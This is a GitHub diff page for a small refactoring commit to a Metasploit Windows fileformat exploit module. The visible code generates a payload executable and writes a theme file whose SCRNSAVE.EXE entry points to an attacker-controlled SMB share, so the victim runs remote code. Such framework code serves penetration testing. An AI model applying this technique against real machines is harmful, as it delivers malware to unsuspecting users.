File tree Expand file tree Collapse file tree 1 file changed +4
-3
lines changed
modules/exploits/windows/fileformat Expand file tree Collapse file tree 1 file changed +4
-3
lines changed Original file line number Diff line number Diff line change @@ -29,7 +29,7 @@ def initialize(info={})
29
29
[
30
30
'Eduardo Prado' , # Vulnerability discovery
31
31
'juan vazquez' , # Metasploit module
32
- 'Matthew Hall <[email protected] >' # Metasploit module refactored to use Remote::SMBFileServer
32
+ 'Matthew Hall <[email protected] >' # Metasploit module refactored to use Msf::Exploit:: Remote::SMB::Server::Share
33
33
] ,
34
34
'References' =>
35
35
[
@@ -66,10 +66,11 @@ def initialize(info={})
66
66
end
67
67
68
68
def exploit
69
- print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
70
69
self . file_contents = generate_payload_exe
71
70
print_status ( "Malicious SCR available on #{ unc } ..." )
71
+
72
72
# Default Windows XP / 2003 theme modified
73
+ print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
73
74
theme = <<-EOF
74
75
; Copyright (c) Microsoft Corp. 1995-2001
75
76
@@ -101,7 +102,7 @@ def exploit
101
102
ScreenSaveActive=0
102
103
103
104
[boot]
104
- SCRNSAVE.EXE=#{ @ unc}
105
+ SCRNSAVE.EXE=#{ unc }
105
106
106
107
[MasterThemeSelector]
107
108
MTSM=DABJDKT
You can’t perform that action at this time.
0 commit comments